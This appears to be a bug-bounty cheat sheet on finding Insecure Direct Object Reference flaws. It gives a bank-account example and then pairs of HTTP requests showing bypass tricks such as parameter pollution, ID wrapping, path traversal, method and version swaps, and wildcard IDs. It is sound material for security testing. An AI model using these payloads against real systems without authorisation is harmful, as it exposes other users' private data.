Insecure Direct Object Reference

Basics

​
​https://owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control.html For example, let's say we're logging into our bank account, and after correctly authenticating ourselves, we get taken to a URL like this https://example.com/bank?account_number=1234. On that page we can see all our important bank details, and a user would do whatever they needed to do and move along their way thinking nothing is wrong. There is however a potentially huge problem here, a hacker may be able to change the account_number parameter to something else like 1235, and if the site is incorrectly configured, then he would have access to someone else's bank information.
​

How to Find

  1. 1.
    Add parameters onto the endpoints for example, if there was
1
GET /api/v1/getuser
2
[...]
Copied!
Try this to bypass
1
GET /api/v1/getuser?id=1234
2
[...]
Copied!
  1. 1.
    HTTP Parameter pollution
1
POST /api/get_profile
2
[...]
3
user_id=hacker_id&user_id=victim_id
Copied!
  1. 1.
    Add .json to the endpoint
1
GET /v2/GetData/1234
2
[...]
Copied!
Try this to bypass
1
GET /v2/GetData/1234.json
2
[...]
Copied!
  1. 1.
    Test on outdated API Versions
1
POST /v2/GetData
2
[...]
3
id=123
Copied!
Try this to bypass
1
POST /v1/GetData
2
[...]
3
id=123
Copied!
  1. 1.
    Wrap the ID with an array.
1
POST /api/get_profile
2
[...]
3
{"user_id":111}
Copied!
Try this to bypass
1
POST /api/get_profile
2
[...]
3
{"id":[111]}
Copied!
  1. 1.
    Wrap the ID with a JSON object
1
POST /api/get_profile
2
[...]
3
{"user_id":111}
Copied!
Try this to bypass
1
POST /api/get_profile
2
[...]
3
{"user_id":{"user_id":111}}
Copied!
  1. 1.
    JSON Parameter Pollution
1
POST /api/get_profile
2
[...]
3
{"user_id":"hacker_id","user_id":"victim_id"}
Copied!
  1. 1.
    Try decode the ID, if the ID encoded using md5,base64,etc
1
GET /GetUser/dmljdGltQG1haWwuY29t
2
[...]
Copied!
dmljdGltQG1haWwuY29t => [email protected]​
  1. 1.
    If the website using graphql, try to find IDOR using graphql!
1
GET /graphql
2
[...]
Copied!
1
GET /graphql.php?query=
2
[...]
Copied!
  1. 1.
    MFLAC (Missing Function Level Access Control)
1
GET /admin/profile
Copied!
Try this to bypass
1
GET /ADMIN/profile
Copied!
  1. 1.
    Try to swap uuid with number
1
GET /file?id=90ri2-xozifke-29ikedaw0d
Copied!
Try this to bypass
1
GET /file?id=302
Copied!
  1. 1.
    Change HTTP Method
1
GET /api/v1/users/profile/111
Copied!
Try this to bypass
1
POST /api/v1/users/profile/111
Copied!
  1. 1.
    Path traversal
1
GET /api/v1/users/profile/victim_id
Copied!
Try this to bypass
1
GET /api/v1/users/profile/my_id/../victim_id
Copied!
  1. 1.
    Change request content type
1
Content-type: application/xml
Copied!
Try this to bypass
1
Content-type: application/json
Copied!
  1. 1.
    Send wildcard instead of ID
1
GET /api/users/111
Copied!
Try this to bypass
1
GET /api/users/*
Copied!
  1. 1.
    Try google dorking to find new endpoint
Reference:
Copy link